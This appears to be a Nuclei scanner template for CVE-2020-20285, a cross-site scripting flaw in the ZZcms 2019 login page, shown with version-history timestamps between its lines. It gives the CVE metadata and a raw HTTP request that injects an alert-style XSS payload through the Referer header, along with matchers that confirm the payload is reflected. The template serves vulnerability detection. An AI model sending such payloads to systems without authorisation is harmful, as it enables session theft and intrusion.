2022-09-30 13:33:15 +00:00
id : CVE-2020-20285
info :
2022-10-19 21:11:27 +00:00
name : ZZcms - Cross-Site Scripting
2022-09-30 13:33:15 +00:00
author : edoardottt
severity : medium
2022-09-30 13:40:34 +00:00
description : |
2022-10-19 21:11:27 +00:00
ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade to the latest version to mitigate this vulnerability.
2022-09-30 13:33:15 +00:00
reference :
- https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-20285
classification :
2022-10-01 10:06:27 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
2022-09-30 13:33:15 +00:00
cve-id : CVE-2020-20285
2022-10-01 10:06:27 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.0009
2024-01-14 13:49:27 +00:00
epss-percentile : 0.37789
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:*
2022-10-01 09:45:15 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:22:36 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : zzcms
product : zzcms
2023-09-06 12:22:36 +00:00
fofa-query : zzcms
2024-01-14 09:21:50 +00:00
tags : cve2020,cve,zzcms,xss
2022-09-30 13:33:15 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-30 13:33:15 +00:00
- raw :
- |
2022-10-01 09:27:54 +00:00
GET /user/login.php HTTP/1.1
2022-09-30 13:33:15 +00:00
Host : {{Hostname}}
Referer : xss"/><img src="#" onerror="alert(document.domain)"/>
matchers-condition : and
matchers :
2022-10-01 09:27:54 +00:00
- type : word
part : body
words :
- 'fromurl" type="hidden" value="xss"/><img src="#" onerror="alert(document.domain)"/>'
2022-09-30 13:33:15 +00:00
- type : word
part : header
words :
- "text/html"
2022-10-01 09:27:54 +00:00
- type : status
status :
- 200
2024-01-14 14:05:19 +00:00
# digest: 4a0a00473045022100fb7ef356cbfd1ded3a19578d3f71335c54df8b5dafb3926f29ee8960266d079a0220077948307fe4bf7891e323734e8157be77d430425054c22b04bc418379ef69c3:922c64590222798bb761d5b6d8e72950